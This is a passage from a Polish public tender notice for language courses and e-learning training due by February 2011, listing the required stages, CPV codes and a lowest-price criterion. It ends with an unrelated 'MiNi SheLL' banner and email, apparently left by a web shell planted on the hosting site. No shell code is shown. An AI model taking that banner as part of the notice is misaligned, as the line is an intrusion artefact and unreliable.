W/w szkolenia mają zostać zrealizowane w okresie od dnia podpisania umowy do lutego 2011. W ramach realizacji tego zadania muszą nastąpić następujące etapy realizacyjne: określenie składu grup szkoleniowych (wg poziomu zaawansowania), organizację i przeprowadzenie szkoleń z zakresu motywacji do nauki języka, szkolenia z zakresu obsługi platformy e-learningowej, realizację szkoleń tradycyjnych i e-learningowych, wykonawca musi przeprowadzić również ewaluację szkoleń językowych. Wykonawca musi być właścicielem platformy lub posiadać umowę na korzystanie z niej. Ponadto wykonawca musi zapewnić  podręcznik spójny merytorycznie (ćwiczenia, słownictwo, gramatyka) z kursem na platformie e-learningowej. Kurs na platformie e-learningowej musi być kompleksowy a nauka zindywidualizowana. Szkolenia stacjonarne winny się odbywać w dniach  roboczych od poniedziałku do piątku . Szczegółowy harmonogram szkoleń zostanie ustalony z wykonawcą , którego oferta zostanie wybrana jako najkorzystniejsza..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.41.00.00-1, 79.63.20.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com